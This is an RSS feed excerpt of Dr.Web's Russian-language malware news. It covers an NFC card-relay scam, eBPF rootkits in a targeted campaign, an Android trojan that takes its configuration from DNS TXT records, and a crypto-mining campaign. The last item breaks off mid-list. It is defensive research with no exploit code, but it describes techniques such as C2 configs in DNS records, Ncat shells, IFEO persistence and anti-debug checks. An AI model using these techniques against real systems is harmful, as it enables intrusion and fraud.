&lt;div class="margTM margBM flex center"&gt;
  &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.kz/static/new-www/news/2024/december/vir-news/5.png" class="preview"&gt;
         &lt;img src="https://st.drweb.kz/static/new-www/news/2024/december/vir-news/5.png" alt="fake_app_screen"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.kz/static/new-www/news/2024/december/vir-news/1.png" class="preview"&gt;
         &lt;img src="https://st.drweb.kz/static/new-www/news/2024/december/vir-news/1.png" alt="fake_app_screen"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.kz/static/new-www/news/2024/december/vir-news/2.png" class="preview"&gt;
         &lt;img src="https://st.drweb.kz/static/new-www/news/2024/december/vir-news/2.png" alt="fake_app_screen"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
  &lt;div class="flex fxCenter"&gt;
      &lt;a href="https://st.drweb.kz/static/new-www/news/2024/december/vir-news/3.png" class="preview"&gt;
         &lt;img src="https://st.drweb.kz/static/new-www/news/2024/december/vir-news/3.png" alt="fake_app_screen"&gt;
      &lt;/a&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;p class="noMargT alignCenter"&gt;&lt;em&gt;Экраны фейковых приложений&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Пока жертва удерживает карту, приложенную к своему смартфону, злоумышленник уже будет находиться у банкомата и запрашивать выдачу наличных. Альтернативным вариантом является реализация данной схемы для бесконтактной оплаты покупок. И в момент, когда нужно будет приложить карту, мошенник просто предъявит свой телефон, который передаст цифровой отпечаток банковской карты жертвы. Подтвердить операцию он сможет полученным раннее PIN-кодом.&lt;/p&gt;

&lt;p&gt;Во избежание кражи денег аналитики «Доктор Веб» рекомендуют соблюдать следующие правила:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;не сообщать никому PIN- или CVV-коды своих банковских карт,&lt;/li&gt;
&lt;li&gt;использовать антивирусное ПО, оно заблокирует скачивание и установку вредоносного ПО,&lt;/li&gt;
&lt;li&gt;внимательно проверять адреса веб-страниц, где предлагается раскрывать любую финансовую информацию,&lt;/li&gt;
&lt;li&gt;устанавливать приложения только из официальных источников, таких как RuStore, AppGalery и Google Play,&lt;/li&gt;
&lt;li&gt;не вступать в разговоры с мошенниками. Если поступил неожиданный звонок от сотрудников органов правопорядка, банка, портала Госуслуг, Пенсионного фонда или любой другой организации, то следует повесить трубку. Затем можно найти контактный номер на официальном сайте ведомства и позвонить по нему самостоятельно.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Подробнее об &lt;a href="https://vms.drweb.kz/search/?q=Android.Banker.NGate.1&amp;lng=kk"&gt;&lt;b&gt;Android.Banker.NGate.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/tree/master/Android.Banker.NGate.1" target="_blank" rel="noopener noreferrer"&gt;Индикаторы компрометации&lt;/a&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=14955&amp;lng=kk</guid><title>Популяризация технологии eBPF и другие тренды в трояностроении</title><link>https://news.drweb.kz/show/?i=14955&amp;lng=kk&amp;c=23</link><pubDate>Tue, 10 Dec 2024 14:11:06 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;10 декабря 2024 года&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Исследование очередного киберинцидента позволило вирусным аналитикам «Доктор Веб» выявить идущую хакерскую кампанию, в ходе которой проявились многие современные тенденции, применяемые злоумышленниками.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;В компанию «Доктор Веб» обратился клиент, который заподозрил факт взлома своей компьютерной инфраструктуры. Выполняя анализ полученных данных, наши вирусные аналитики выявили ряд аналогичных случаев заражения, что позволило сделать вывод о проведении активной кампании. Усилия хакеров в основном сосредоточены на регионе Юго-Восточной Азии. В ходе атак они применяют целый комплекс вредоносного ПО, которое задействуется на разных этапах. К сожалению, нам не удалось однозначно определить то, как был получен изначальный доступ к скомпрометированным машинам. Однако мы смогли восстановить всю дальнейшую картину атаки. Наиболее примечательна эксплуатация злоумышленниками технологии eBPF (extended Berkeley Packet Filter).&lt;/p&gt;

&lt;blockquote&gt;
  &lt;p&gt;Технология eBPF была разработана с целью расширения возможностей контроля над сетевой подсистемой ОС Linux и работой процессов. Она продемонстрировала довольно большой потенциал, что привлекло внимание крупных IT-компаний: практически с самого момента ее появления в фонд eBPF Foundation вошли такие гиганты как Google, Huawei, Intel и Netflix, принявшие участие в ее дальнейшей разработке. Однако еBPF заинтересовались и хакеры.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Предоставляя обширные низкоуровневые возможности, EBPF может использоваться злоумышленниками для сокрытия сетевой активности и процессов, сбора конфиденциальной информации, а также обхода сетевых экранов и систем обнаружения вторжений. Высокая сложность детектирования такого вредоносного ПО позволяет использовать его в рамках целевых АРТ-атак и в течение долгого времени маскировать активность хакеров.&lt;/p&gt;
&lt;p&gt;Именно такими возможностями и решили воспользоваться злоумышленники, загрузив на скомпрометированную машину сразу два руткита. Первым устанавливался eBPF-руткит, который скрывал факт работы другого руткита, выполненного в виде модуля ядра, а тот, в свою очередь, подготавливал систему к установке трояна удаленного доступа. Особенностью трояна является поддержка ряда технологий туннелирования трафика, что позволяет ему связываться со злоумышленниками из приватных сегментов сети и маскировать передачу команд.&lt;/p&gt;
&lt;p&gt;Использование вредоносного eBPF ПО набирает обороты с 2023 года. Об этом свидетельствует появление на свет нескольких семейств вредоносного ПО, основанных на данной технологии, среди которых можно отметить Boopkit, BPFDoor и Symbiote. А регулярное выявление уязвимостей лишь усугубляет ситуацию. Так, на сегодняшний день известны 217 уязвимостей BPF, причем около 100 из них датированы 2024 годом.&lt;/p&gt;
&lt;p&gt;Следующей необычной особенностью кампании является довольно креативный подход к хранению настроек трояна. Если раньше для подобных нужд чаще всего использовались выделенные серверы, то теперь все чаще можно встретить случаи, когда конфигурация вредоносного ПО хранится в открытом доступе на публичных площадках. Так, исследуемое ПО обращалось к платформам Github и даже к страницам одного китайского блога. Такая особенность позволяет меньше привлекать внимание к трафику скомпрометированной машины — ведь та взаимодействует с безопасным узлом сети, — а также не заботиться о поддержании доступа к управляющему серверу с настройками. В целом идея использования публично-доступных сервисов в качестве управляющей инфраструктуры не нова, и ранее хакеры уже применяли для этой цели Dropbox, Google Drive, OneDrive и даже Discord. Однако региональные блокировки этих сервисов в ряде стран, в первую очередь в Китае, делают их менее привлекательными с точки зрения доступности. При этом доступ к Github сохраняется у большинства провайдеров, что делает его предпочтительным в глазах взломщиков.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2024/december/eBPF_02.png" class="preview"&gt;
      &lt;img src="https://st.drweb.kz/static/new-www/news/2024/december/eBPF_02.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
  &lt;/p&gt;
&lt;/div&gt;
&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2024/december/eBPF_01.png" class="preview"&gt;
      &lt;img src="https://st.drweb.kz/static/new-www/news/2024/december/eBPF_01.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
  &lt;/p&gt;
&lt;/div&gt;
&lt;p class="alignCenter"&gt;&lt;em&gt;Настройки, хранящиеся на Gitlab и в блоге, посвященном безопасности. Курьезно, что во втором случае взломщик просит помощи в расшифровке стороннего кода, который в дальнейшем будет отправляться трояну в качестве аргумента одной из команд&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Ещё одной особенностью данной кампании стало применение трояна в составе фреймворка для постэксплуатации, то есть комплекса ПО, применяемого на дальнейших этапах атаки после получения доступа к компьютеру. Сами по себе такие фреймворки не являются чем-то запрещённым — их используют компании, официально предоставляющие услуги по аудиту безопасности. Наиболее популярными инструментами являются Cobalt Strike и Metasploit, которые позволяют автоматизировать большое количество проверок и имеют встроенную базу уязвимостей.&lt;/p&gt;
&lt;div class="column_grid_review column_grid_review--o"&gt;
  &lt;p class="alignCenter"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2024/december/eBPF_04.png" class="preview"&gt;
      &lt;img src="https://st.drweb.kz/static/new-www/news/2024/december/eBPF_04.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
  &lt;/p&gt;
&lt;/div&gt;
&lt;p class="alignCenter"&gt;&lt;em&gt;Пример карты сети, построенной Cobalt Strike (источник: сайт разработчика)&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Конечно, такие возможности высоко ценятся и в среде хакеров. В 2022 году широкому кругу лиц стала доступна взломанная версия ПО Cobalt Strike, что обеспечило всплеск хакерской активности. Значительная часть инфраструктуры Cobalt Strike размещена в Китае. Отметим, что разработчик предпринимает усилия по отслеживанию установок фреймворка, а серверы со взломанными версиями регулярно блокируются органами правопорядка. Поэтому в настоящее время наблюдается устойчивый тренд перехода к использованию фреймворков с открытым исходным кодом, которые изначально поддерживают возможность расширения и видоизменения сетевой активности между зараженным устройством и сервером управления. Такая стратегия является предпочтительной, так как позволяет не привлекать дополнительное внимание к инфраструктуре взломщиков.&lt;/p&gt;

&lt;p&gt;По результатам расследования все выявленные угрозы были добавлены в наши базы вредоносного ПО, дополнительно в алгоритмы эвристика были внесены признаки вредоносных eBPF-программ.&lt;/p&gt;
&lt;p&gt;Подробнее об &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Siggen28.58279&amp;lng=kk"&gt;&lt;b&gt;Trojan.Siggen28.58279&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/tree/master/Trojan.Siggen28.58279" target="_blank" rel="noopener noreferrer"&gt;Индикаторы компрометации&lt;/a&gt;&lt;/p&gt;
</description></item><item><guid>https://news.drweb.kz/show/?i=14935&amp;lng=kk</guid><title>Вредоносные приложения в Google Play: как злоумышленники используют DNS-протокол для скрытой связи троянов с управляющими серверами</title><link>https://news.drweb.kz/show/?i=14935&amp;lng=kk&amp;c=23</link><pubDate>Mon, 11 Nov 2024 14:27:07 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;11 ноября 2024 года&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Задачей многих троянов Android.FakeApp является переход по ссылкам на различные сайты, и с технической точки зрения такие вредоносные программы довольно примитивны. При запуске они получают команду на открытие заданного веб-адреса, в результате чего установившие их пользователи вместо ожидаемой программы или игры видят на экранах своих устройств содержимое нежелательного сайта. Однако иногда среди таких подделок все же встречаются примечательные образцы — такие как &lt;a href="https://vms.drweb.kz/search/?q=Android.FakeApp.1669&amp;lng=kk"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt;. От большинства подобных угроз он отличается использованием модифицированной библиотеки dnsjava, с помощью которой получает конфигурацию с вредоносного DNS-сервера, содержащую целевую ссылку. При этом такая конфигурация поступает ему только при подключении к интернету через определенных провайдеров — например, мобильного интернета. В иных же случаях троян никак себя не проявляет.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.kz/search/?q=Android.FakeApp.1669&amp;lng=kk"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; представлен большим числом модификаций, которые под видом тех или иных приложений распространяются в том числе через каталог Google Play. Так, известные в настоящий момент варианты трояна были загружены из официального электронного магазина ОС Android по меньшей мере 2 160 000 раз.&lt;/p&gt;

&lt;div class="fx -part_2 fxItemsCenter"&gt;
  &lt;div class="paddXS paddYS noMarg cell"&gt;
      &lt;p class="alignCenter"&gt;
          &lt;a href="https://st.drweb.com/static/new-www/news/2024/november/01_fakeapp.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2024/november/01_fakeapp.1.png" alt="#drweb"&gt;&lt;/a&gt;
      &lt;/p&gt;
  &lt;/div&gt;
  &lt;div class="paddXS paddYS noMarg cell"&gt;
      &lt;p class="alignCenter"&gt;
          &lt;a href="https://st.drweb.com/static/new-www/news/2024/november/02_fakeapp.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2024/november/02_fakeapp.1.png" alt="#drweb"&gt;&lt;/a&gt;
      &lt;/p&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;div class="fx -part_2 fxItemsCenter"&gt;
  &lt;div class="paddXS paddYS noMarg cell"&gt;
      &lt;p class="alignCenter"&gt;
          &lt;a href="https://st.drweb.com/static/new-www/news/2024/november/03_fakeapp.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2024/november/03_fakeapp.1.png" alt="#drweb"&gt;&lt;/a&gt;
      &lt;/p&gt;
  &lt;/div&gt;
  &lt;div class="paddXS paddYS noMarg cell"&gt;
      &lt;p class="alignCenter"&gt;
          &lt;a href="https://st.drweb.com/static/new-www/news/2024/november/04_fakeapp.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2024/november/04_fakeapp.1.png" alt="#drweb"&gt;&lt;/a&gt;
      &lt;/p&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;p class="alignCenter"&gt;&lt;em&gt;Примеры программ, в которых скрывался &lt;a href="https://vms.drweb.kz/search/?q=Android.FakeApp.1669&amp;lng=kk"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Ниже перечислены варианты &lt;a href="https://vms.drweb.kz/search/?q=Android.FakeApp.1669&amp;lng=kk"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt;, которые вирусные аналитики «Доктор Веб» выявили в Google Play. Наши специалисты обнаружили больше троянских программ, но часть из них в этом магазине приложений уже отсутствует.&lt;/p&gt;

&lt;table class="Table" style="width: 60%;"&gt;
  &lt;thead&gt;
    &lt;tr&gt;
      &lt;th&gt;Название приложения&lt;/th&gt;
      &lt;th&gt;Число загрузок&lt;/th&gt;
    &lt;/tr&gt;
  &lt;/thead&gt;
  &lt;tbody&gt;
    &lt;tr&gt;&lt;td&gt;Split it: Checks and Tips&lt;/td&gt;&lt;td&gt;1 000 000+&lt;/td&gt;&lt;/tr&gt;
    &lt;tr&gt;&lt;td&gt;FlashPage parser&lt;/td&gt;&lt;td&gt;500 000+&lt;/td&gt;&lt;/tr&gt;
    &lt;tr&gt;&lt;td&gt;BeYummy - your cookbook&lt;/td&gt;&lt;td&gt;100 000+&lt;/td&gt;&lt;/tr&gt;
    &lt;tr&gt;&lt;td&gt;Memogen&lt;/td&gt;&lt;td&gt;100 000+&lt;/td&gt;&lt;/tr&gt;
    &lt;tr&gt;&lt;td&gt;Display Moving Message&lt;/td&gt;&lt;td&gt;100 000+&lt;/td&gt;&lt;/tr&gt;
    &lt;tr&gt;&lt;td&gt;WordCount&lt;/td&gt;&lt;td&gt;100 000+&lt;/td&gt;&lt;/tr&gt;
    &lt;tr&gt;&lt;td&gt;Goal Achievement Planner&lt;/td&gt;&lt;td&gt;100 000+&lt;/td&gt;&lt;/tr&gt;
    &lt;tr&gt;&lt;td&gt;DualText Compare&lt;/td&gt;&lt;td&gt;100 000+&lt;/td&gt;&lt;/tr&gt;
    &lt;tr&gt;&lt;td&gt;Travel Memo&lt;/td&gt;&lt;td&gt;100 000+ (удалена)&lt;/td&gt;&lt;/tr&gt;
    &lt;tr&gt;&lt;td&gt;DessertDreams Recipes&lt;/td&gt;&lt;td&gt;50 000+&lt;/td&gt;&lt;/tr&gt;
    &lt;tr&gt;&lt;td&gt;Score Time&lt;/td&gt;&lt;td&gt;10 000+&lt;/td&gt;&lt;/tr&gt;
  &lt;/tbody&gt;
&lt;/table&gt;

&lt;p&gt;При запуске &lt;a href="https://vms.drweb.kz/search/?q=Android.FakeApp.1669&amp;lng=kk"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; выполняет DNS-запрос к управляющему серверу для получения TXT-записи, ассоциированной с именем целевого домена. В свою очередь, сервер отдает эту запись трояну, только если зараженное устройство подключено к Сети через целевых провайдеров, среди которых — провайдеры мобильного интернета. Такие TXT-записи обычно содержат сведения о домене и некоторую другую техническую информацию, однако в случае с &lt;a href="https://vms.drweb.kz/search/?q=Android.FakeApp.1669&amp;lng=kk"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; в ней находится закодированная конфигурация для вредоносной программы.&lt;/p&gt;

&lt;blockquote&gt;
  Для отправки DNS-запросов &lt;a href="https://vms.drweb.kz/search/?q=Android.FakeApp.1669&amp;lng=kk"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; использует модифицированный код Open Source-библиотеки dnsjava.
&lt;/blockquote&gt;

&lt;p&gt;Все модификации трояна привязаны к конкретным доменным именам, что позволяет DNS-серверу передавать каждой из них свою конфигурацию. Более того, имена субдоменов целевых доменов уникальны для каждого зараженного устройства. В них закодированы данные об устройстве, в том числе чувствительные:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;модель и бренд устройства;&lt;/li&gt;
  &lt;li&gt;размеры экрана;&lt;/li&gt;
  &lt;li&gt;идентификатор (состоит из двух чисел: первое — время установки троянского приложения, второе — случайное число);&lt;/li&gt;
  &lt;li&gt;заряжается ли батарея и каков текущий процент ее заряда;&lt;/li&gt;
  &lt;li&gt;включены ли настройки разработчика.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Например, вариант &lt;a href="https://vms.drweb.kz/search/?q=Android.FakeApp.1669&amp;lng=kk"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt;, который скрывается в приложении Goal Achievement Planner, при анализе запросил у сервера TXT-запись для домена &lt;span class="string"&gt;3gEBkayjVYcMiztlrcJXHFSABDgJaFNNLVM3MjFCL0RTU2Ftc3VuZyAg[.]simpalm[.]com.&lt;/span&gt;, вариант из программы Split it: Checks and Tips — запись для домена &lt;span class="string"&gt;3gEBkayjVYcMiztlrcJXHFTABDgJaFNNLVM3MjFCL0RTU2Ftc3VuZyAg[.]revolt[.]digital.&lt;/span&gt;, а вариант из DessertDreams Recipes — для домена &lt;span class="string"&gt;3gEBkayjVYcMiztlrcJXHFWABDgJaFNNLVM3MjFCL0RTU2Ftc3VuZyAg[.]outorigin[.]com.&lt;/span&gt;.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/november/05_c2_response.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/november/05_c2_response.1.png" alt="#drweb"&gt;
  &lt;/a&gt;
&lt;/p&gt;
&lt;p class="alignCenter"&gt;&lt;em&gt;Пример TXT-записи целевого домена, которую DNS-сервер отдал при запросе через Linux-утилиту dig при анализе одной из модификаций &lt;a href="https://vms.drweb.kz/search/?q=Android.FakeApp.1669&amp;lng=kk"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Для расшифровки содержимого этих TXT-записей необходимо выполнить следующие шаги:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;перевернуть строку;&lt;/li&gt;
  &lt;li&gt;декодировать Base64;&lt;/li&gt;
  &lt;li&gt;разжать gzip;&lt;/li&gt;
  &lt;li&gt;разбить на строки по символу &lt;span class="string"&gt;÷&lt;/span&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;В результате получатся данные следующего вида (пример ниже относится к TXT-записи для приложения Goal Achievement Planner):&lt;/p&gt;

&lt;code&gt;&lt;pre&gt;
url
hxxps[:]//goalachievplan[.]pro
af_id
DF3DgrCPUNxkkx7eiStQ6E
os_id
f109ec36-c6a8-481c-a8ff-3ac6b6131954
&lt;/pre&gt;&lt;/code&gt;

&lt;p&gt;В них содержится ссылка, которую троян загружает в WebView внутри своего окна поверх основного интерфейса. Эта ссылка ведет на сайт, запускающий длинную цепочку перенаправлений, в конце которой оказывается сайт онлайн-казино. В результате &lt;a href="https://vms.drweb.kz/search/?q=Android.FakeApp.1669&amp;lng=kk"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; фактически превращается в веб-приложение, которое демонстрирует содержимое загруженного веб-сайта, а не ту функциональность, которая заявлена на странице приложения в Google Play.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/november/06_Android.FakeApp.1669_website.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/november/06_Android.FakeApp.1669_website.1.png" alt="#drweb"&gt;
  &lt;/a&gt;
&lt;/p&gt;
&lt;p class="alignCenter"&gt;&lt;em&gt;Вредоносная программа вместо ожидаемой функциональности отобразила содержимое загруженного сайта онлайн-казино&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;В то же время, когда трояну доступно интернет-соединение не через целевых поставщиков (а также в офлайн-режиме), он работает как обещанная программа — при условии, если создатели той или иной модификации предусмотрели какую-либо функциональность на такой случай.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/november/07_Android.FakeApp.1669_normal.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/november/07_Android.FakeApp.1669_normal.1.png" alt="#drweb"&gt;
  &lt;/a&gt;
&lt;/p&gt;
&lt;p class="alignCenter"&gt;&lt;em&gt;Троян не получил конфигурацию от управляющего сервера и запустился как обычная программа&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Dr.Web Security Space для мобильных устройств успешно детектирует и удаляет все известные модификации &lt;a href="https://vms.drweb.kz/search/?q=Android.FakeApp.1669&amp;lng=kk"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt;, поэтому для наших пользователей этот троян опасности не представляет.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.FakeApp.1669/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Индикаторы компрометации&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Подробнее об &lt;a href="https://vms.drweb.kz/search/?q=Android.FakeApp.1669&amp;lng=kk"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=14920&amp;lng=kk</guid><title>В ходе кампании по распространению трояна для добычи и кражи криптовалюты пострадали более 28 тысяч пользователей</title><link>https://news.drweb.kz/show/?i=14920&amp;lng=kk&amp;c=23</link><pubDate>Tue, 08 Oct 2024 16:04:14 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;8 октября 2024 года&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;Вирусные аналитики компании «Доктор Веб» выявили идущую масштабную кампанию по распространению вредоносного ПО для добычи и кражи криптовалюты, в рамках которой трояны доставлялись на машины жертв под видом офисных программ, читов для игр и ботов для онлайн-трейдинга.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;В ходе рутинного анализа облачной телеметрии, поступающей от наших пользователей, специалисты вирусной лаборатории Доктор Веб выявили подозрительную активность программы, замаскированной под компонент ОС Windows (&lt;span class="string"&gt;StartMenuExperienceHost.exe&lt;/span&gt;, легитимный процесс с таким именем отвечает за управление меню Пуск). Эта программа связывалась с удаленным сетевым узлом и ждала подключения извне для того, чтобы сразу же запустить интерпретатор командной строки &lt;span class="string"&gt;cmd.exe&lt;/span&gt;.&lt;/p&gt;

&lt;p&gt;Замаскированной под системный компонент была сетевая утилита Ncat, которая используется в правомерных целях для передачи данных по сети посредством командной строки. Именно эта находка помогла восстановить последовательность событий безопасности, среди которых были попытки заражения компьютеров вредоносным ПО, предотвращенные антивирусом Dr.Web.&lt;/p&gt;

&lt;p class="alignCenter"&gt;
  &lt;a href="https://st.drweb.com/static/new-www/news/2024/october/1.png" class="preview"&gt;
    &lt;img src="https://st.drweb.com/static/new-www/news/2024/october/1.1.png" alt="#drweb"&gt;
  &lt;/a&gt;
&lt;/p&gt;  
&lt;div class="fx -part_2 fxItemsCenter"&gt;
  &lt;div class="paddXS paddYS noMarg cell"&gt;
      &lt;p class="alignCenter"&gt;
          &lt;a href="https://st.drweb.com/static/new-www/news/2024/october/2.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2024/october/2.1.png" alt="#drweb"&gt;&lt;/a&gt;
      &lt;/p&gt;
  &lt;/div&gt;
  &lt;div class="paddXS paddYS noMarg cell"&gt;
      &lt;p class="alignCenter"&gt;
          &lt;a href="https://st.drweb.com/static/new-www/news/2024/october/3.png" class="preview"&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2024/october/3.1.png" alt="#drweb"&gt;&lt;/a&gt;
      &lt;/p&gt;
  &lt;/div&gt;
&lt;/div&gt;

&lt;p&gt;Источником заражения являются мошеннические сайты, которые злоумышленники создают на платформе GitHub (оговоримся, что такая деятельность запрещена правилами платформы), и запуск скачанных оттуда программ. Альтернативно, ссылки на вредоносное ПО могут быть закреплены в описаниях под видео на хостинге Youtube. При клике по ссылке скачивается самораспаковывающийся зашифрованный архив, защищенный паролем, что предотвращает его автоматическое сканирование антивирусами. После ввода пароля, который хакеры указывают на странице скачивания, на компьютере жертвы в папку &lt;span class="string"&gt;%ALLUSERSPROFILE%\jedist&lt;/span&gt; распаковывается следующий набор временных файлов:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;span class="string"&gt;UnRar.exe&lt;/span&gt; — распаковщик архивов RAR;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;WaR.rar&lt;/span&gt; — архив RAR;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;Iun.bat&lt;/span&gt; — сценарий, который создает задачу на выполнение скрипта &lt;span class="string"&gt;Uun.bat&lt;/span&gt;, инициирует перезагрузку компьютера и удаляет себя;&lt;/li&gt;
  &lt;li&gt;&lt;span class="string"&gt;Uun.bat&lt;/span&gt; — обфусцированный скрипт, который распаковывает файл &lt;span class="string"&gt;WaR.rar&lt;/span&gt;, запускает находящиеся в нем файлы &lt;span class="string"&gt;ShellExt.dll&lt;/span&gt; и &lt;span class="string"&gt;UTShellExt.dll&lt;/span&gt;, после чего удаляет задачу, созданную &lt;span class="string"&gt;Iun.bat&lt;/span&gt; и папку &lt;span class="string"&gt;jedist&lt;/span&gt; вместе с ее содержимым.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Файл &lt;span class="string"&gt;ShellExt.dll&lt;/span&gt; представляет собой интерпретатор языка AutoIt и сам по себе не является вредоносным. Однако, это не его настоящее имя. Злоумышленники переименовали исходный файл с именем &lt;span class="string"&gt;AutoIt3.exe&lt;/span&gt; в &lt;span class="string"&gt;ShellExt.dll&lt;/span&gt; для маскировки под библиотеку программы WinRAR, которая отвечает за интеграцию функций архиватора в контекстное меню Windows. После своего запуска интерпретатор в свою очередь загружает файл &lt;span class="string"&gt;UTShellExt.dll&lt;/span&gt;, который был позаимствован мошенниками у утилиты Uninstall Tool. К этой библиотеке, подписанной действительной цифровой подписью, они «пришили» вредоносный AutoIt скрипт. После его выполнения происходит распаковка полезной нагрузки, все файлы которой сильно обфусцированы.&lt;/p&gt;

&lt;blockquote&gt;
  Язык AutoIt является языком программирования для создания скриптов автоматизации и утилит для ОС Windows. Простота освоения и широкая функциональность сделали его популярным среди разных категорий пользователей, в том числе и вирусописателей. Некоторые антивирусные программы детектируют любой скомпилированный скрипт AutoIt как вредоносный.
&lt;/blockquote&gt;

&lt;p&gt;Файл &lt;span class="string"&gt;UTShellExt.dll&lt;/span&gt; выполняет следующие действия:&lt;/p&gt;
&lt;ol&gt;
  &lt;li&gt;Ищет запущенное отладочное ПО в списке процессов. В скрипте содержатся названия примерно 50 различных утилит, используемых для отладки, и при выявлении хотя бы одного процесса из этого списка, скрипт завершает свою работу&lt;/li&gt;
  &lt;li&gt;Если отладочное ПО не найдено, в скомпрометированную систему распаковываются файлы, необходимые для продолжения атаки. Часть файлов является «чистой», они необходимы для реализации сетевого взаимодействия, а остальные выполняют вредоносные действия&lt;/li&gt;
  &lt;li&gt;Создает системные события для обеспечения сетевого доступа с помощью Ncat и загрузки BAT и DLL файлов, а также вносит изменения в реестр для реализации перехвата запуска приложений с использованием техники IFEO
    &lt;blockquote&gt;
      IFEO (Image File Execution Options) — это возможности, предоставляемые ОС Windows для разработчиков ПО, например, автоматический запуск отладчика при старте приложения. Однако злоумышленники могут использовать техники IFEO для закрепления в системе. Для этого они меняют путь до отладчика, указывая вместо него путь до вредоносного файла, таким образом, при каждом запуске легитимного приложения будет также запускаться и вредоносное. В этом случае хакеры «цеплялись» к системным службам ОС Windows, а также к процессам обновления браузеров Google Chrome и Microsoft Edge (&lt;span class="string"&gt;MoUsoCoreWorker.exe&lt;/span&gt;, &lt;span class="string"&gt;svchost.exe&lt;/span&gt;, &lt;span class="string"&gt;TrustedInstaller.exe&lt;/span&gt;, &lt;span class="string"&gt;GoogleUpdate.exe&lt;/span&gt; и &lt;span class="string"&gt;MicrosoftEdgeUpdate.exe&lt;/span&gt;).
    &lt;/blockquote&gt;
  &lt;/li&gt;
  &lt;Li&gt;Запрещает доступ к удалению, записи и изменения для папок и файлов, созданных на этапе 2&lt;/Li&gt;
